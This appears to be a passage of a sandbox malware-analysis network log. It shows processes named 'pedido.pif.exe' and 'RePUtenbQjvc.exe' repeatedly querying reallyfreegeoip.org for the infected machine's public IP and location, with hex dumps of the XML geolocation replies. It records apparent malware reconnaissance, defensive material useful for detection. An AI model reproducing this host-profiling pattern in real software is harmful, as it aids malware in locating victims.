2024-10-31 09:37:37 UTC	149	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
2024-10-31 09:37:37 UTC	210	IN	Data Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49724	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:38 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:37:38 UTC	1212	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:38 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4333 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QtMWHYWWCgfJy3IjZBSc2ePYbwtQ3%2FWVci5u7SblhmpBYInEaeeZHZBtVKD1Vh8yD0ELBKDCW5tHyEtbw1QLqMLGBvTywb2GHGr3jmDMFrOSxNHMMUuW2UU8vferZZu6XCJlM5Iu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aae84c0d46e6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1700&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1743527&cwnd=251&unsent_bytes=0&cid=be7ef5bf8c88b204&ts=149&x=0"
2024-10-31 09:37:38 UTC	157	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas<
2024-10-31 09:37:38 UTC	202	IN	Data Raw: 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: /RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49725	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:39 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:37:39 UTC	1218	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:39 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4334 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S1J1PEzu23RwF31O31mRYq1ql3fm9dhmoOzp4dFv7YDbtHJOM0gKdK3Yi7UGrCl8Nwmhk8BXqpIW4%2F10Y2%2F2HY5gupPxYv%2F5wb3KmJuvGwC5WUq6ziQNvzfPtsM248p5V8%2FqChZF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aaeb9b7e6b14-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1900&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1505980&cwnd=250&unsent_bytes=0&cid=3344ef0141c8d27a&ts=154&x=0"
2024-10-31 09:37:39 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-10-31 09:37:39 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49728	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:39 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:37:40 UTC	1215	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:40 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4335 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=00ItftCbsJNbPodQIfSXB2xE4tLpa6xhFV%2F2Kvbp5XtX6p36Ya7glEEGkQA40VjDzwC1a8ca2C8NVgLjTFcy1lnxFvgRZKqctRiuNiJBKY63TRvhPMh9LM%2BRw30KiLEJdJv4NCy%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aaf12b25466b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=943&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2850393&cwnd=251&unsent_bytes=0&cid=db1afc202107077b&ts=147&x=0"
2024-10-31 09:37:40 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-10-31 09:37:40 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49731	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:40 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:37:40 UTC	1215	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:40 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4335 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSNhHbDCnKqO5MXQ0DbfsArEq6E6S3bboRUSFPO1yHxjfAYY3YruhO6ETa%2F9zYbXJz5m7PR0PwKart6i1UgKxRmjHR51diVW70owX28prre6K%2BDi6UWH%2F5mcL7cjwBB6GPnbWdeR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aaf49e18475d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2928210&cwnd=239&unsent_bytes=0&cid=d56d5b10e825d6ef&ts=147&x=0"
2024-10-31 09:37:40 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-10-31 09:37:40 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49734	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:41 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:41 UTC	1216	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:41 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4336 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZRs6tJ3F9lmWuv8z8PxArHdaLJ9oQxVVGk0lyYYPsBb0FwqLq4dDPKVQkEDP4zn%2FhYXups6itscePEw24RbaCkCQeQMhvqC0Ako3w0erVQYyMLjZBOJXeJ%2FFp0sT1nZKOROLf%2Fek"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aafa08746c7f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2354471&cwnd=237&unsent_bytes=0&cid=d634fd554843256a&ts=144&x=0"
2024-10-31 09:37:41 UTC	153	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Te
2024-10-31 09:37:41 UTC	206	IN	Data Raw: 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: xas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49737	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:43 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:43 UTC	1222	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:43 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4338 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iqhRRAO3viS3yndSevWOFpzO2Dwto0sVRvCJ1Jh39r65uM8D%2Ftm7sZkBA%2F3GoH2CUF69cKt1RHZKPvv4urmW9Pr%2FF%2FxINTj3gotWqm2vL8%2BUEtVN%2FnsZofIgIUUhjOnHFUENXguc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2ab062d6a6c6b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1617877&cwnd=234&unsent_bytes=0&cid=665f74522f3a4c75&ts=486&x=0"
2024-10-31 09:37:43 UTC	147	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
2024-10-31 09:37:43 UTC	212	IN	Data Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49739	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:44 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:44 UTC	1226	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:44 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4339 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pfkh9UdWWecdXRxHWXVWtIKX%2F34p4CIZmPEisDrx2%2Fmg%2F5pf%2FRHzUS%2BWpkvX0hdkYtL%2B44O3v8pbrimMta6WC9sknO2hbI4yaVG3lerm8Lxh80E2wBHC11vEt%2B%2FQETuaG3pwAYXA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2ab0f1957477f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1189&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2439764&cwnd=242&unsent_bytes=0&cid=7ae60124b6470dbb&ts=150&x=0"
